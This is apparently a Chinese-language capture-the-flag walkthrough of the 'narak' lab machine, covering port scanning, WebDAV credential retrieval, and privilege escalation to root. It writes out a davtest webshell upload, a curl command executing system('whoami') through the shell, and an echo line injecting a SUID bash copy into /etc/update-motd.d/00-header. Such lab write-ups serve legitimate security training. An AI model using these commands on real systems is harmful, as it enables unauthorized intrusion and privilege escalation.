narak
user shell
目标IP:192.168.205.136
端口信息
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
web路径扫描
得到信息
http://192.168.205.136/webdav webdav
http://192.168.205.136/tips.txt
web路径下没有发现creds.txt
,也没有其他tcp文件服务,探测一下tftp
69/udp open|filtered tftp
拿到webdav凭据,尝试上传文件
auth=$(base64 -d creds.txt)
davtest --auth $auth --url http://192.168.205.136/webdav --uploadfile shell.php --uploadloc w.php
成功拿到webshell
curl --anyauth --user $auth "http://192.168.205.136/webdav/w.php?code=system('whoami')%3b"
反弹shell,拿到www-data权限
root shell
枚举
find / -perm -ug=rwx -type f 2>/dev/null
/etc/update-motd.d/91-release-upgrade
/etc/update-motd.d/00-header
/etc/update-motd.d/50-motd-news
/etc/update-motd.d/80-esm
/etc/update-motd.d/80-livepatch
/etc/update-motd.d/10-help-text
motd文件提权
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/update-motd-privilege-escalation/
echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header
但是需要ssh连接成功才可以提权,我们还没有密码
ls -alih /mnt
total 16K
917506 drwxr-xr-x 3 root root 4.0K Sep 22 2020 .
2 drwxr-xr-x 22 root root 4.0K Sep 21 2020 ..
920902 -rwxrwxrwx 1 root root 124 Sep 22 2020 hell.sh
920657 drwxr-xr-x 2 nobody root 4.0K Sep 21 2020 karma
--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.
hell.sh一段brainfuck
https://www.splitbrain.org/services/ook
解码得到chitragupt
,经过尝试,是inferno的密码
ssh连接
./bash -p
拿到root权限